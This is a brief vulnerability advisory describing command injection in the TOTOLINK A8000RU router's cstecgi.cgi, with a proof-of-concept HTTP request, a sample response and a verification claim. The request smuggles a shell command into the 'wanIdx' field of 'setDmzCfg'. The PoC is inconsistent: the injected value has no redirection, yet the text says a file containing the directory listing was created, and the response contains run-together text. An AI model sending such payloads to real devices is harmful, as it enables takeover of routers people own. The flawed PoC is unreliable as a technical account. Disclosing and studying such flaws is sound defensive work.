# Summary of Command Injection Vulnerability in A8000RU ## Vulnerability Overview A command injection vulnerability exists in the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands by crafting malicious requests to `cstecgi.cgi`. ## Affected Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643_b20200521 ## Remediation No specific remediation is currently provided on the vendor's page. It is recommended to contact the vendor to obtain updates or patches. ## Proof of Concept (PoC) The following is an example of an HTTP request exploiting this vulnerability: ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.1 Content-Length: 80 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=217724057022 Connection: keep-alive {"topicUrl":"setDmzCfg","enable":"2","wanIdx":"ls; /setDmzCfg.txt"} ``` ### Response Example ```http HTTP/1.1 200 OK Date: Fri, 27 Mar 2006 01:30:23 GMT Server: lighttpd/1.4.30 Content-Length: 235 Content-Type: application/json; charset=UTF-8 SendMyToApplysetdifferentnumbersofflysthanexpected Pleasecheckaplyservice {"success":true, "error":null, "wanIdx":"192.168.0.1", "vtime":"0", "report":"report"} ``` ### Result Verification After submitting the above HTTP request, it was observed that a `.txt` file was successfully created, containing the directory listing. This confirms that the command `ls; /setDmzCfg.txt` was executed successfully.